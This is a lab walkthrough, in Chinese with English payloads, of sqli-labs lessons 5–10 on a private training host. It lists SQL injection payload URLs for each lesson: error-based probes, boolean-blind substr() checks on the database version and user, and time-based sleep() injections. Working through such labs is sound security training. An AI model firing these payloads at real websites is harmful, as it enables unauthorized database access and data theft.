Less5 GET - Double Injection - Single Quotes http://10.10.202.112/sqli/Less-5?id=1
http://10.10.202.112/sqli/Less-5?id=1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 http://10.10.202.112/sqli/Less-5?id=1" You are in........... 猜测SQL语句为: select login_name,password from table_name where id='$id' limit 0,1 构造payload http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true
Less-6 GET - Double Injection - Double Quotes http://10.10.202.112/sqli/Less-6?id=1" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1 猜测SQL语句应该为: select login_name,password from table_name where id="$id" limit 0,1 http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s
Less-7 GET - Dump into outfile - String 看了源码SQL语句为: SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1 构造payload http://10.10.202.112/sqli/Less-7?id=1')) and sleep(5) -- - http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=4--+ #false http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=5--+ #true
Less-8 GET - Blind - Boolian Based - Single Quotes http://10.10.202.112/sqli/Less-8?id=1' #false http://10.10.202.112/sqli/Less-8?id=1'--+ #true 猜测SQL: SELECT * FROM users WHERE id='$id' LIMIT 0,1 http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true
Less-9 GET - Blind - Time based. - Single Quotes 源代码SQL SELECT * FROM users WHERE id='$id' LIMIT 0,1 payload: http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+ http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+
Less-10 GET - Blind - Time based - double quotes http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+ http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+ 待续。。。 点击赞赏二维码,您的支持将鼓励我继续创作!
|
|